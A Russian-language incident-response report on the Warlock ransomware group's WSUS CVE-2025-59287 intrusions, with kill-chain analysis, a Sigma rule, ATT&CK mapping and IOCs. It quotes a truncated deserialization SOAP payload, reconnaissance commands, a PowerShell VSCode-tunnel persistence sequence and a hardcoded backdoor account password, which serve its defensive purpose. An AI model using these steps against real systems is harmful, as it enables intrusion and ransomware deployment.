Всем привет! Сегодня с нами Владимир Авдеев, эксперт по реагированию на инциденты, и Александр Гантимуров, руководитель направления обратной разработки Angara MTDR.

Вместо эпилога

  1. Сколько проходит часов после публикации POC до начала сканирования? 2 часа.

  2. Сколько у вас есть времени, перед тем как Warlock пошифруют всё? 2 дня.

  3. Как проникают? CVE-2025-59287.

  4. Какими инструментами пользуются? WarlockRAT, Warlock Cryptor + куча свободных утилит.

В ноябре 2025 года эксперты по реагированию на инциденты Angara MTDR столкнулись с несколькими инцидентами с участием группировки Warlock (также отслеживаемые как Lenient Wolf, Storm-2603, GOLD SALEM). Данный кластер активности использует уязвимости внешнего контура как один из первоначальных векторов атак, например, CVE-2023-24955, CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, CVE-2025-53771, в опубликованном веб-приложении SharePoint. В октябре 2025 года этот ряд пополнился свежей уязвимостью WSUS CVE-2025-59287, которая имеет рейтинг критичности 9,8 из 10 по CVSS.

Атаки отличались коротким временем между проникновением и шифрованием, новыми инструментами и строились по одной модели kill-chain, которая приведена ниже.

Разберём теперь атаку по этапам.

Reconnaissance

Всё началось 25 октября 2025 года с появления публичной версии PoC эксплойта для WSUS.

Буквально через несколько часов после публикации начались массовые сканирования на предмет наличия уязвимости. Компания BitDefender уже 28 октября выпустила отчёт, в котором привела четыре различных сценария действий злоумышленников, но без привязки к конкретным группировкам. Как показали наши расследования, сценарий D в отчёте BitDefender в точности соответствовал действиям группировки Warlock.

Сразу после обнародования уязвимости вышло несколько подробных статей о том, чем она грозит и на чём основана. Основная часть уязвимости связана с передачей данных для десериализации через класс .NET BinaryFormatter. Данные передаются в WSUS в виде SOAP-запроса, который будет сохранён в базе данных WSUS. Группировка Warlock обычно подчищала за собой журналы системы, но, к счастью, в большинстве своих атак база данных WSUS оставалась нетронутой.

Высока вероятность, что вся нагрузка в формате для BinaryFormatter генерировалась при помощи инструмента YSoNet или YSoSeria.Net.

При первичном сканировании всем WSUS-серверам отсылалась библиотека, которая должна была внедриться в процесс w3wp.exe. При наличии уязвимости и удачном внедрении в заголовок HTTP-ответа сервера добавлялось поле PaloAltoNetworkAST: vulnerable.

Код из вредоносной библиотеки
Код из вредоносной библиотеки

Проверка уязвимости

Уже 25 октября на VirusTotal была загружена библиотека, которая была использована для проверки.

Initial Access

Спустя несколько часов выявленным уязвимым серверам приходил ещё один запрос, но уже с другой вредоносной нагрузкой.

<?xml version="1.0" encoding="utf-16"?>
 <ArrayOfString xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <string>Administrator=SYSTEM</string>
  <string>SynchronizationUpdateErrorsKey=&lt;SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"&gt;&lt;SOAP-ENV:Body&gt;&lt;a1:DataSet id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/System.Data/System.Data%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3Db77a5c561934e089"&gt;&lt;DataSet.RemotingFormat xsi:type="a1:SerializationFormat" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/System.Data/System.Data%2C%20Version%3D4.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3Db77a5c561934e089"&gt;Binary&lt;/DataSet.RemotingFormat&gt;&lt;DataSet.DataSetName id="ref-3"&gt;&lt;/DataSet.DataSetName&gt;&lt;DataSet.Namespace href="#ref-3"/&gt;&lt;DataSet.Prefix href="#ref-3"/&gt;&lt;DataSet.CaseSensitive&gt;false&lt;/DataSet.CaseSensitive&gt;&lt;DataSet.LocaleLCID&gt;1033&lt;/DataSet.LocaleLCID&gt;&lt;DataSet.EnforceConstraints&gt;false&lt;/DataSet.EnforceConstraints&gt;&lt;DataSet.ExtendedProperties xsi:type="xsd:anyType" xsi:null="1"/&gt;&lt;DataSet.Tables.Count&gt;1&lt;/DataSet.Tables.Count&gt;&lt;DataSet.Tables_0 href="#ref-4"/&gt;&lt;/a1:DataSet&gt;&lt;SOAP-ENC:Array id="ref-4" xsi:type="SOAP-ENC:base64"&gt;
 AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCw...CBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAAWFByZXNlbnRhM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==
 &lt;/SOAP-ENC:Array&gt;&lt;/SOAP-ENV:Body&gt;&lt;/SOAP-ENV:Envelope&gt;
 </string>
 </ArrayOfString>

Об успешной эксплуатации уязвимости можно узнать из журнала WSUS C:\Program Files\Update Services\LogFiles\SoftwareDistribution.log, в котором будет отражена ошибка десериализации объекта.

Пример ошибки в журнале WSUS
Пример ошибки в журнале WSUS

Отследить такую активность в реальном времени без дополнительных инструментов в виде должного централизованного мониторинга инфраструктуры и оперативного анализа событий с коне��ных узлов — нетривиальная задача. Эффективное обнаружение и противодействие требует корреляции событий из различных источников:

  • проверка событий безопасности, связанных с процессами (например, Sysmon EventID 1, EventID 4688),

  • запуск и выполнение команд PowerShell (PowerShell EventID 4103, 4104, 400, 600).

Критически важным является мониторинг не только прямого запуска PowerShell из WSUS-компонентов, но и косвенных цепочек, где атакующие используют промежуточные стадии для обхода простых детектов.

Наблюдаемые паттерны выполнения через процессы WSUS и компонентов Internet Information Services (IIS):

  • wsusservice.exe → powershell.exe

  • w3wp.exe → powershell.exe

  • wsusservice.exe → cmd.exe → cmd.exe → powershell.exe

  • w3wp.exe → cmd.exe → cmd.exe → powershell.exe

Пример правила Sigma:

title: WSUS Suspicious Process Chain - CVE-2025-59287
description: Detects multi-stage process chains from WSUS components
detection:
 parent_processes:
  ParentImage|endswith:
   - '\wsusservice.exe'
   - '\w3wp.exe'
 suspicious_chains:
  - sequence:
    - Image|endswith: '\cmd.exe'
    - Image|endswith: '\cmd.exe'
    - Image|endswith: '\powershell.exe'
  - sequence:
    - Image|endswith: '\powershell.exe'
  - sequence:
    - Image|endswith: '\wscript.exe'
    - Image|endswith: '\powershell.exe'
 condition: parent_processes and suspicious_chains

Внедрение подобных правил в сочетании с полноценным сбором аудит-логов позволяет значительно снизить время обнаружения атаки и минимизировать потенциальный ущерб от эксплуатации CVE-2025-59287.

Execution

Первоначально злоумышленники проверяли доступность своего сервера со стороны скомпрометированного сервера. А потом приходила закодированная в BinaryFormatter последовательность команд для cmd, по ре��ультатам исполнения которой на сервер загружался и запускался агент Apollo для Mythic Framework.

Дополнительно на заражённые машины мог доставляться разработанный злоумышленниками троян для удалённого доступа (Remote Access Trojan, RAT), который мы назвали WarlockRAT. WarlockRAT написан на .NET и предназначен для повышения привилегий, организации HTTP-туннелей в инфраструктуру, загрузки и запуска произвольных команд. Иногда WarlockRAT был дополнительно обёрнут в библиотеку, которая загружала его в контексте процесса IIS.

Кроме WarlockRAT, который позволял скачивать и запускать программы, загружался установщик Velociraptor. Сам по себе Velociraptor — продвинутый инструмент для цифровой криминалистики и реагирования на инциденты, который используется для сбора криминалистически значимых данных с конечных устройств. Однако в нашем случае атакующие используют его для управления скомпрометированной системой, а также для дозагрузки других утилит и вредоносных файлов. Стоит подчеркнуть, что коллеги из Solar 4RAYS в своём блоге уже отмечали изобретательность группировок, использующих данный инструмент в своих целях, которые зачастую отличаются от заложенного в легитимный инструмент функционала.

Адрес управляющего сервера атакующих содержался в конфигурационном файле Velociraptor, настроенном на взаимодействие с update.githubtestbak.workers[.]dev. Примечательным фактом является использование злоумышленниками этого инструмента версии 0.73.4. Именно она подвержена серьёзной уязвимости с идентификатором CVE-2025-6264, которая позволяет повысить привилегии в системе и выполнять впоследствии произвольные команды.

Впоследствии в заражённой инфраструктуре запускалось множество утилит для сбора информации, дальнейшего распространения и повышения привилегий.

Persistence

В WarlockRAT заложена возможность создания учётной записи администратора с заданным в коде именем adminbak2 и паролем 937ZZXX12@1cez@41, которая будет использоваться для дальнейшего распространения.

Код добавления пользователя
Код добавления пользователя

 Создание учётной записи можно вызвать путём запуска WarlockRat с соответствующим аргументом командной строки или по команде оператора.

Дополнительно злоумышленники создавали сервисы Windows, которые запускали утилиты туннелирования в скомпрометированной инфраструктуре.

Privilege Escalation

WarlockRAT содержит функциональность по краже маркеров доступа (токенов) и повышение привилегий при создании процессов, которые основаны на EfsPotato.

Манипуляция с токенами
Манипуляция с токенами
Повышение привилегий
Повышение привилегий

Кроме этого, через групповые политики Active Directory распространялись скрипты по добавлению скомпрометированных учётных записей в группы администраторов.

Defense Evasion

Через GPO также осуществлялось отключение привилегированных учётных записей, антивирусной защиты и изменялись настройки межсетевого экрана.

В последнем случае через Windows Firewall открывали порт 3389 для всех входящих подключений.

Для обхода механизма аутентификации Kerberos использовался Skeleton Key: в память процесса lsass.exe внедрялся мастер-ключ, который можно использовать для аутентификации в качестве любого пользователя в домене.

Discovery

Получив доступ в систему, злоумышленник осуществлял типичный набор действий:

  • собирал информацию об инфраструктуре Active Directory и учётных данных;

  • получал список пользователей и групп;

  • загружал дополнительные утилиты для туннелирования, получения реквизитов учётных записей и эксфильтрации.    

Сбор информации о системе

В WarlockRAT встроен свой сборщик функционала о заражённой системе, который:

  • собирает список процессов;

  • собирает информацию об активных сессиях пользователей;

  • выводит список сетевых интерфейсов;

  • получает информацию об активных соединениях.

В ходе расследования выявлены факты сбора информации через командный интерпретатор:

whoami
hostname
ipconfig /all
tasklist /svc
net user
wmic product get name,identifyingnumber
(Get-ADComputer -Filter "DNSHostName -like '*' -and Enabled -eq '$true'") | Select-Object DNSHostName

Сбор информации Active Directory

Active Directory могла исследоваться через командный интерпретатор:

net group "domain computers"
net group "domain controllers"
quser
net group "domain admins" /do
nltest /domain_trusts

А также через ADExplorer, который доставлялся дополнительно.

Credential Access

Чаще всего злоумышленники получали учётные данные через дамп памяти процесса LSASS при помощи встроенного модуля в NetExec.

Для получения административного доступа к серверу VMware ESXi могла использоваться уязвимость с идентификатором CVE-2024-37085. Эта уязвимость позволяет злоумышленникам скомпрометировать учётные записи пользователей и автоматически добавлять их в группу ESX Admins, которая обладает расширенными правами администратора в системе ESXi.

В одном из случаев Warlock собирал учётные данные из установленного Veeam Backup and Replicaton при помощи скриптов PowerShell.

Command-n-Control

Для удалённого доступа к инфраструктуре использовались:

  • Velociraptor,

  • Apollo для Mythic Framework,

  • WarlockRAT,

  • Chrome Remote Desktop. 

Сбор информации о системе

Кроме RAT, злоумышленники Warlock загружали следующий набор утилит:

  • JSTokenUtil — для работы с токенами пользователей;

  • OXIDScan — для сканирования внутри сети;

  • ADExplorer — для сбора информации из Active Directory;

  • NetExec и PsExec — для дальнейшего распространения;

  • AdvancedRun — для запуска программ от администратора;

  • SharpNamedPipePTH и Skeleton Key — для проведения атак на Kerberos;

  • Chrome Remote Desktop — для удалённого управления скомпрометированными устройствами;

  • Cloudflared, wsocks, wstunnel и VSCode-cli — для туннелирования.

В одном из инцидентов Warlock не постеснялись установить OpenSSH Server и браузер Google Chrome, при помощи которого осуществлялся доступ к веб-интерфейсам внутри атакованной инфраструктуры.

Туннелирование

Если WarlockRAT запущен в контексте процесса IIS, то он может создавать HTTP-туннели внутрь инфраструктуры. Код для туннелирования позаимствован у китайского инструмента Suo5.

Кроме этого, для туннелирования использовались cloudflared, wsocks, wstunnel и даже VSCode.

VSCode использовался для создания туннелей .devtunnels.ms аналогично одноимённому инструменту dev-tunnels и развёртывался через PowerShell.

Invoke-WebRequest -Uri "https://vscode.download.prss.microsoft.com/dbazure/download/insider/09401e712d4ffa5e497787978fe90c1557a0092b/vscode_cli_win32_x64_cli.zip" -OutFile "C:\ProgramData\Microsoft\AppV\code.exe"
Expand-Archive C:\ProgramData\Microsoft\AppV\code.exe -DestinationPath C:\ProgramData\Microsoft\AppV\
move C:\ProgramData\Microsoft\AppV\code.exe C:\ProgramData\Microsoft\AppV\code.zip
Expand-Archive C:\ProgramData\Microsoft\AppV\code.zip -DestinationPath C:\ProgramData\Microsoft\AppV\
C:\ProgramData\Microsoft\AppV\code.exe tunnel user login --provider github
cd C:\ProgramData\Microsoft\AppV\
ls
C:\ProgramData\Microsoft\AppV\code-insiders.exe tunnel user login --provider github
New-Service -Name "VScode" -BinaryPathName "C:\ProgramData\Microsoft\AppV\code-insiders.exe tunnel service install --accept-server-license-terms" -DisplayName "Vscode Service" -Description "Runs Windows Vscode" -StartupType Automatic
Start-Service -Name "VScode"
C:\ProgramData\Microsoft\AppV\code-insiders.ex tunnel service install --accept-server-license-terms
cmd /c C:\ProgramData\Microsoft\AppV\code-insiders.ex tunnel service install --accept-server-license-terms
C:\ProgramData\Microsoft\AppV\code-insiders.exe tunnel service install --accept-server-license-terms

Если о dev-tunnels совсем недавно рассказывали Олег Скулкин из BI.ZONE на SOCFORUM2025 и наши коллеги из Positive Technologies, то использование vscode-cli мы видели впервые. Стоит отметить, что атакующие использовали более гибкую версию автономной командной строки Insiders, где службы Dev Tunnels полностью интегрированы. Кроме того, в скомпрометированной системе может присутствовать журнал службы туннелирования, содержащий подробную техническую информацию о работе туннелей, в том числе адреса серверов Microsoft, публичный URL-адрес туннеля, а также время его запуска.

Ещё одной примечательной утилитой является wsocks, которая Microsoft Defender определяется как BlunderBlight. Она обеспечивала туннелирование к скомпрометированной инфраструктуре по протоколу websocket. Причём в одном исполняемом файле реализована функциональность и сервера, и клиента. Wsocks также обладает возможностью устанавливаться как сервис при запуске с соответствующими аргументами командной строки.

Lateral movement

Кроме созданных учётных записей администраторов, для дальнейшего распространения использовались PsExec и NetExec.

При этом применяли достаточно шумные и легко обнаруживаемые методы, такие как установка вредоносного ПО и интенсивное сканирование внутренней сети. Эти действия создают заметный трафик и аномалии в работе систем, которые при адекватной настройке и внимательном мониторинге должны были вызвать тревогу у специалистов по безопасности. Однако в данном случае отсутствовала опытная команда, которая постоянно отслеживала бы подобные подозрительные активности и своевременно реагировала на них. Из-за этого атака осталась незамеченной на ранних этапах, что позволило злоумышленникам беспрепятственно распространяться по инфраструктуре и захватывать ресурсы.

Pass the Hash

Warlock проводили атаки на Kerberos Pass the Hash при помощи SharpNamedPipePTH.

Exfiltration

Для эксфильтрации данных использовались Rclone и MinIO Client. Согласно результатам анализа криминалистических артефактов, выгрузка данных происходила не при каждом инциденте, несмотря на заявления самих злоумышленников. Однако в условиях продвинутых атак артефактов форензики недостаточно для построения полной картины. В этом случае для эффективного выявления утечек необходим синтез данных от отдельных средств защиты информации и сторонней телеметрии.

Impact

Обычно Warlock требовалось от 2 до 4 дней для получения полного доступа к инфраструктуре. Если из захваченной инфраструктуры данные не выгружались, то злоумышленники сразу приступали к этапу шифрования.

На финальной стадии для шифрования систем виртуализации VMWare ESXi использовался вымогатель семейства Babuk, а для Windows-машин — свой шифровальщик Warlock Cryptor.

Ранее Warlock использовали LockBit 3.0, но с середины 2025 года полностью перешли на свой шифровальщик. Уже в августе 2025-го его описывали наши коллеги из Trendmicro.

Warlock Cryptor мог доставляться в виде библиотеки или исполняемого файла. Библиотека исполнялась через rundll32 при помощи отдельного BAT-скрипта, который запускался из планировщика задач. В дальнейшем злоумышленники осуществляли единовременное шифрование всех ресурсов через групповую политику AD.

Шифровальщик Warlock добавляет расширение .x2anylock для зашифрованных файлов, а само шифрование осуществляется при помощи ChaCha20. Ключ генерируется на основе ECDH для каждого файла в отдельности на основе ключа злоумышленника, зашитого в сам шифровальщик.

Выводы

Современные хакерские группировки достигли высокого уровня оперативности и автоматизации компьютерных атак. В момент появления публичных POC-уязвимостей злоумышленники почти мгновенно начинают сканировать уязвимые серверы, чтобы найти и воспользоваться выявленными брешами в информационной безопасности.

Группировка Warlock на своём примере показала, что может проникнуть в инфраструктуру почти сразу после обнародования уязвимости и получить к ней полный доступ до того, как администраторы безопасности что-либо заметят.

После проникновения хакеры очень быстро распространяются по сети, зачастую используя при этом самые актуальные и даже очень нестандар��ные техники перемещения и повышения привилегий. Время реакции у специалистов сокращается до нескольких часов, что часто недостаточно для предотвращения масштабного заражения.

Этот пример наглядно демонстрирует, как критически важен качественный мониторинг, который не только отслеживает типовые компьютерные атаки, но и учитывает быстро меняющийся ландшафт угроз, новые методы злоумышленников и особенно свежие уязвимости.

MITRE ATT&CK

Техника

Процедура

Reconnaissance

T1595.002 Active Scanning: Vulnerability Scanning

Warlock активно сканировали серверы WSUS на предмет уязвимости CVE-2025-59287

Initial Access

T1190 Exploit Public-Facing Application

Атакующие использовали уязвимость CVE-2025-59287 в WSUS для получения доступа и выполнения произвольных команд в системе

Execution

T1047 Windows Management Instrumentation

Для удалённого выполнения команд использовался WMI

T1059.001 Command and Scripting Interpreter: PowerShell

Атакующие использовали интерпретатор PowerShell и командную строку Windows для выполнения команд и скриптов в системе

T1059.003 Command and Scripting Interpreter: Windows Command Shell

T1059.012 Command and Scripting Interpreter: Hypervisor CLI

Атакующие использовали интерпретатор esxcli в инфраструктуре виртуализации VMware ESXi для сбора информации

T1569.002 System Services: Service Execution

Использовались PsExec, NetExec, которые запускаются через сервисы Windows

Persistence

T1053.005 Scheduled Task/Job: Scheduled Task

Атакующие создавали запланированные задачи для выполнения и закрепления ВПО

T1078.002 Valid Accounts: Domain Accounts

Атакующие использовали существующие доменные учётные записи

T1136.001 Create Account: Local Account

Атакующие создавали учётные записи с правами локального администратора

T1505.003 Server Software Component: Web Shell

Атакующие загружали командную оболочку для удалённого управления веб-сервером (веб-шелл)

T1543.003 Create or Modify System Process: Windows Service

Атакующие создавали службы с целью закрепления в системе

T1556.001 Modify Authentication Process: Domain Controller Authentication

Атакующие использовали инструмент Skeleton Key, вносящий изменения в процесс аутентификации с возможностью доступа к учётным данным любого пользователя

Privilege Escalation

T1068 Exploitation for Privilege Escalation

Атакующие использовали уязвимость CVE-2024-37085 для повышения привилегий на гипервизорах ESXi

T1078.002 Valid Accounts: Domain Accounts

Атакующие использовали существующие доменные учётные записи

T1098.007 Account Manipulation: Additional Local or Domain Groups

Атакующие добавляли локальные учётные записи во все локальные группы, в том числе привилегированные

T1134.001 Access Token Manipulation: Token Impersonation/Theft

Использовались инструменты на основе EfsPotato и JCTokenUtil

T1136.001 Create Account: Local Account

Атакующие создавали учётные записи с правами локального администратора

Defense Evasion

T1027.010 Obfuscated Files or Information: Command Obfuscation

Команды PowerShell были дополнительно закодированы в base64

T1027.015 Obfuscated Files or Information: Compression

Внедряемая вредоносная нагрузка сжималась при помощи Gzip

T1036.004 Masquerading: Masquerade Task or Service

Атакующие использовали название службы Security State Check для маскировки инструмента wsocks

T1055.002 Process Injection: Portable Executable Injection

Атакующие использовали вредоносные библиотеки для внедрения в память WarlockRAT

T1112 Modify Registry

Атакующие изменяли ключи реестра, в том числе Restricted Admin для получения удалённого доступа без ввода пароля

T1562.001 Impair Defenses: Disable or Modify Tools

Атакующие отключали антивирусную защиту, в том числе путём изменения ключей реестра

T1562.004 Impair Defenses: Disable or Modify System Firewall

Атакующие отключали Windows Firewall, а также открывали порт 3389 для всех входящих подключений

T1556.001 Modify Authentication Process: Domain Controller Authentication

Атакующие использовали инструмент Skeleton Key, вносящий изменения в процесс аутентификации с возможностью доступа к учётным данным любого пользователя

Credential Access

T1003.001 OS Credential Dumping: LSASS Memory

Атакующие использовали инструмент NetExec, функционал которого позволяет получать данные из памяти процесса LSASS

Discovery

T1007 System Service Discovery

Атакующие собирали информацию о системных службах командой tasklist /svc

T1012 Query Registry

Атакующие обращались к реестру (reg query) для получения информации об окружении виртуальной инфраструктуры

T1016.001 System Network Configuration Discovery: Internet Connection Discovery

Атакующие осуществляли проверку сетевой доступности систем командой ping

T1018 Remote System Discovery

В арсенале атакующих был инструмент OXIDScan, использующийся для получения информации об удалённых системах

T1033 System Owner/User Discovery

Атакующие собирали информацию о пользователях, используя команды whoami и quser

T1049 System Network Connections Discovery

Атакующие использовали команду netstat-ano|findstr 3389 для обнаружения сетевых соединений по RDP

T1069.001 Permission Groups Discovery: Local Groups

Атакующие просматривали локальные группы командой net localgroup

T1069.002 Permission Groups Discovery: Domain Groups

Атакующие просматривали доменные группы командой net group /domain

T1082 System Information Discovery

Атакующие собирали подробную информацию о системе командой systeminfo

T1083 File and Directory Discovery

Атакующие использовали команду dir для обнаружения файлов и каталогов

T1087.002 Account Discovery: Domain Account

Атакующие получали список доменных учётных записей командой dsquery user

T1124 System Time Discovery

Атакующие собирали информацию о системном времени командой net time

T1135 Network Share Discovery

Атакующие просматривали подключённые сетевые диски: net use, net share

T1518.002 Software Discovery: Backup Software Discovery

Атакующие получали информацию о системе резервного копирования Veeam

T1673 Virtual Machine Discovery

Атакующие просматривали список запущенных виртуальных машин командой esxicli vm process list

Lateral Movement

T1021.001 Remote Services: Remote Desktop Protocol

Атакующие использовали службу удалённых рабочих столов (RDP), протокол SMB, в том числе утилиту PsExeс (для выполнения команд на удалённых системах), а также службу удалённого управления WinRM для горизонтального передвижения в сети

T1021.002 Remote Services: SMB/Windows Admin Shares

T1021.006 Remote Services: Windows Remote Management

T1021.004 Remote Services: SSH

Атакующие обеспечивали доступ по SSH из скомпрометированной системы

T1570 Lateral Tool Transfer

Атакующие копировали свои инструменты в рамках установленных RDP-сессий

T1550.002 Use Alternate Authentication Material: Pass the Hash

В арсенале атакующих был инструмент SharpNamedPipePTH, использующийся для атак типа Pass the Hash

Command and Control

T1071.001 Application Layer Protocol: Web Protocols

Для связи с сервером управления инструменты wsocks и wstunnel из арсенала атакующих используют протоколы HTTP и WebSocket

T1090.002 Proxy: External Proxy

Атакующие устанавливали SOCKS5-прокси инструмент для связи с управляющими серверами

T1105 Ingress Tool Transfer

Атакующие загружали дополнительные инструменты с внешних ресурсов, включая C2-серверы

T1572 Protocol Tunneling

Атакующие использовали инструменты, обеспечивающие туннелирование сетевого соединения

Exfiltration

T1048.002 Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Для выгрузки данных использовались Rclone и MinIO Client

T1567.001 Exfiltration Over Web Service: Exfiltration to Cloud Storage

Impact

T1486 Data Encrypted for Impact

Атакующие использовали программы-вымогатели семейства Warlock для шифрования данных ОС Windows и Babuk для ESXi, в том числе для получения финансовой выгоды

Индикаторы компрометации

MD5

  • 6AE09BB129D251980CD7B19292BE78FB — TokenUtil

  • D305AC1E09E8509345B1CA97DD3FE02C — SharpNamedPipePTH

  • CC5DF445B75FD50EC4BE4B4346C817C0 — Skeleton Key

  • DB89EC570E6281934A5C5FCF7F4C8967 — PsExec

  • C563056E9B3BEA79262C49FE3974B92F — Impacket

  • 16FB41CF9A652913F1FF186243C48EC0 — Apollo

  • 4DD544C3513D0606AF052D33A183A8F2 — OXIDScan

  • 3A55D8F8F29716C694671834D8C6CB29 — Velociraptor

  • 683103721619B316534115BCC068C7FD — Установщик Velocirapto

  • F44E811544362F20AB3C8B9212208AAC — wstunnel

  • 99188828B1B7770FDF55CF25442D4C03 — Установщик wsocks

  • 599A775770411C012B24E2F8E148D09E — wsocks

  • 378C5585CD204E0FF6A28D5E59F5E686 — Rclone

  • 4BA756BFF1A78F17AD477D818FE7E283 — MinIO Client

  • FFAFBC75A9ECA9E3D145D45970492A6F — Warlock Cryptor

  • 94A38EFF715576FFAB05D28C0C638D65 ��� Warlock Cryptor

  • 5380758888DB6538FD0AD75FFFF59587 — Cloudflared

  • A9E390237A96E0C6655B1A06F8D72C6F — ADExplorer

  • 2661F8272ADA236CF3AEB9CE9323626C — ADExplorer

  • 8E024A4C90F17F1AEDC7FC53D5CA23C6 — NetExec

  • 3F44DD7F287DA4A9A1BE82E5178B7DC8 — AdvancedRun

  • FD91321BF7FF7245DDA9B7B5D791ACE8 — WarlockRAT

  • 7CA608465E3C860A43EAF133E53EB745 — библиотеки для проверки на уязвимость

  • 271DD648F947CD021B9C814ACAA816F7 — библиотеки для проверки на уязвимость

SHA-1

  • 0FF4D4DEDF275669ACAB299BD2635A1425FA8DC2 — TokenUtil

  • 6C7F62679D84C7B365FBB666D6A09D3A526AE374 — SharpNamedPipePTH

  • 363761519F0770596ABF717BDEC29997DB10C260 — Skeleton Key

  • 0098C79E1404B4399BF0E686D88DBF052269A302 — PsExec

  • B435DB186106FBB053CE6D1D9178D642792E9723 — Impacket

  • 1865AA09A523195B86D4C8A0554282DB16A937D8 — Apollo

  • 9354804225E2168FF3E971E672F1E112C8A84F07 — OXIDScan

  • AA0B7D4D3E1638A9C622779D27B5EE9118352B6E — Velociraptor

  • C8F2DCEC692B82AFA1FE9BF286EAD6585269B7AB — установщик Velociraptor

  • 9335CA254AF61F9B9D52079CD387FCA25D04F468 — wstunnel

  • 098306E1A34022E0C3654C2839757C3F1ABBE184 — установщик wsocks

  • 75787A3ADC1063D750C3139F764A14D2920A30AB — wsocks

  • 259B9AD407D8626FD18F956021F49314BCC3A880 — Rclone

  • 0D385213A4BB59E6E1B36667B48D924F33D24E90 — MinIO Client

  • 56134D9FC68FF7EA70F4B14C9DA8A5946D32BEF1 — Warlock Cryptor

  • 85C05B9E848F33B715E1B0AE4C8D4B744F8EA1A0 — Warlock Cryptor

  • D530931F9679F8EF6DCE30E47DEE5C94A990ACF1 — Cloudflared

  • 6B242AD80260F3CB3E67A1D2A1EE164DE465C76E — ADExplorer

  • 98683C358724EDA64BD5C1DF5DF6D2AF8BCEDD15 — ADExplorer

  • 44F3067C0AE0F5BB46B1C5455F881EB646FBA782 — NetExec

  • 996FCF7B6C0A5ED217A46B013C067E0C1FE3EBA9 — AdvancedRun

  • 69FA8DEC978938629F1AECAB9154603C4BFB55D7 — WarlockRAT

  • 70D91B700189E2EE546A129CF6C13B77B9C9BCE7 — библиотека для проверки на уязвимость

  • C55C826F626E6891E0B8CDD79D8F13B30FF78439 — библиотека для проверки на уязвимость

Сетевые индикаторы:

  • filebin[.]net — ресурс для обмена файлами

  • 168.231.117[.]229 — C2 Warlock

  • 162.252.199[.]85 — C2 Warlock

  • upload.jbowpxyy.workers[.]dev — адрес загрузки Velociraptor

  • royal-boat-bf05.qgtxtebl.workers[.]dev — адрес загрузки Velociraptor

  • update.githubtestbak.workers[.]dev — адрес управляющего сервера Velociraptor

  • *.devtunnels[.]ms — адреса серверов Dev Tunnels

  • 93.127.214[.]58 — C2 Apollo

  • esx-enterprise[.]com — C2 Apollo

  • loglog.ac.d189493a.digimg[.]store — C2 Warlock

  • wsus.ac.d189493a.digimg[.]store — C2 Warlock

  • 134.209.107[.]209 — C2 Warlock